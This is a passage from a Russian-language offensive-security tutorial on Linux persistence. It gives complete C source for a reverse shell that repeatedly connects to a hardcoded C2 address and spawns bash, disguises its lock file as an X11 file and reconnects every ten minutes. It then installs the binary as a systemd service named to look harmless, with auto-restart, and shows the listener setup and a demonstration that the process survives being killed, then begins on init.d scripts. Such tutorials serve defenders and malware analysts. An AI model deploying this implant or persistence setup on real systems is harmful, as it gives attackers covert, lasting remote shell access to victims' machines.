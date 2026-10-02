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kill. Канал первоначального доступа могут закрыть, например сменив пароль или установив обновление, которое устраняет уязвимость.
Закрепиться в Linux можно множеством способов. Некоторые семплы перебирают разные варианты и выбирают доступный. Сегодня мы с тобой разберем девять техник, которые я встречал в реальных вредоносах:
systemd;
system service
init.;
d
crontab;
@reboot
systemd;
user timer
.;
bashrc
systemd;
user service
XDG;
Autostart
udev;
rule
LD_PRELOAD.
Пишем малварь
Для демонстрации закрепления напишу простенький реверс‑шелл. Если не знаешь, что это такое, прочитай мою статью «Реверс‑шелл с самого начала. Как заставить сервер подключиться к нам».
#include <stdio.h>#include <stdlib.h>#include <unistd.h>#include <sys/socket.h>#include <sys/file.h>#include <netinet/in.h>#include <arpa/inet.h>#include <signal.h>#define C2_IP "192.168.0.153"#define C2_PORT 1337int main(void){ int lf = open("/tmp/.X11-lock", O_CREAT | O_RDWR, 0600); if(lf < 0 || flock(lf, LOCK_EX | LOCK_NB) < 0) return 1; signal(SIGCHLD, SIG_IGN); for(;;){ int s = socket(AF_INET, SOCK_STREAM, 0); struct sockaddr_in sa = { .sin_family = AF_INET, .sin_port = htons(C2_PORT), }; inet_pton(AF_INET, C2_IP, &sa.sin_addr); if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == 0){ if(fork() == 0){ dup2(s, 0); dup2(s, 1); dup2(s, 2); execl("/bin/bash", "bash", NULL); } } close(s); sleep(600); }}
Разберем, что тут происходит. Первым делом открываем файл
/ и с помощью
flock ставим эксклюзивную блокировку. Если файл уже заблокирован, значит, копия уже работает, и мы молча выходим. Это защита от дублей: сколько бы раз мы ни попытались запустить наш бинарник, работать будет только один экземпляр. Имя файла специально маскируется под X11 — такие файлы в
/ никого не удивят.
SIGCHLD ставим в
SIG_IGN, чтобы дочерние процессы не превращались в зомби. Дальше запускаем бесконечный цикл: пытаемся подключиться к оператору, а при успешном подключении вызываем
fork(. Дочерний процесс получает шелл через
dup2 и
execl, а родительский закрывает сокет, ждет десять минут и пробует снова. Даже если оператор отключится, через десять минут прилетит новый шелл.
Собираем, зачищаем и кладем PoC в
/. Обычно
/ чистится при перезагрузке, а нам нужно, чтобы бинарник ее пережил:
gcc -o poc poc.c -O3
strip poc
cp poc /opt/poc
На своей машине запускаем слушатель:
nc -lvnp 1337
Запуск при загрузке системы
Начнем с самого простого — автоматического запуска вместе с системой.
systemd service
- Техника T1543.002
Самый прямолинейный способ. Создаем юнит‑файл в
/, и systemd будет запускать наш бинарь при каждой загрузке как системный сервис. Название выбираем неброское, неприметное. Например,
not_malware. Идеально!
Напишем конфиг для
not_malware.:
[Unit]Description=System Monitor ServiceAfter=network.target[Service]Type=simpleExecStart=/opt/pocRestart=alwaysRestartSec=10[Install]WantedBy=multi-user.target
Разберем ключевые поля:
After=network.— ждем готовности сети, иначе реверс‑шелл попытается подключиться, когда интерфейс еще не готов;
target
Restart=always+
RestartSec=10— если процесс завершат командой
kill,
systemdперезапустит его через десять секунд;
WantedBy=multi-user.— сервис запускается в обычном многопользовательском режиме, то есть практически при любой загрузке.
target
Активируем:
systemctl daemon-reload
systemctl enable --now not_malware.service
Флаг
--now сразу запускает сервис, не дожидаясь перезагрузки. Проверяем:
systemctl status not_malware.service
● not_malware.service - System Monitor Service Loaded: loaded (/etc/systemd/system/not_malware.service; enabled; vendor preset: disabled) Active: active (running) since Wed 2026-07-15 23:08:40 MSK; 801ms ago Main PID: 4536 (poc) Tasks: 2 (limit: 2298) Memory: 560.0K CPU: 22ms CGroup: /system.slice/not_malware.service ├─ 4536 /opt/poc └─ 4537 bash
Сервис активен и будет запускаться при каждой загрузке. Проверим перезапуск: найдем процесс, убьем его и посмотрим, запустился ли он снова:
[cu63@fedora systemd_system_service]$ ps aux | grep poc root 4536 0.0 0.0 2472 1024 ? Ss 23:08 0:00 /opt/poc cu63 4575 0.0 0.1 222192 2432 pts/0 S+ 23:13 0:00 grep --color=auto po [cu63@fedora systemd_system_service]$ sudo kill 4536 [cu63@fedora systemd_system_service]$ ps aux | grep poc root 4618 0.0 0.0 2472 1024 ? Ss 23:14 0:00 /opt/poc cu63 4623 0.0 0.1 222192 2432 pts/0 S+ 23:14 0:00 grep --color=auto poc
Готово. Способ хороший, но заметный: юнит‑файл лежит на виду, а
systemctl покажет включенный сервис.
Чтобы удалить сервис, используй следующие команды:
systemctl disable --now not_malware.service
rm /etc/systemd/system/not_malware.service
systemctl daemon-reload
init.d
- Техника T1037.004
Еще до появления
systemd в Linux использовали систему инициализации
SysVinit. Сервисы в ней описывались скриптами оболочки в каталоге
/. Каждый скрипт должен был обрабатывать аргументы
start,
stop и
restart. Команда
service передавала скриптам эти аргументы и так управляла сервисами.
В
SysVinit режим работы системы называется
runlevel. Основные режимы:
0— выключение;
1— однопользовательский режим;
2–5— обычная работа;
6— перезагрузка.
Для каждого уровня запуска есть свой каталог:
/,
/ и так далее до
rc6. (в Debian они находятся прямо в
/). Внутри — символические ссылки на скрипты из
/:
/etc/rc.d/rc3.d/S99not_malware → ../init.d/not_malware
/etc/rc.d/rc0.d/K01not_malware → ../init.d/not_malware
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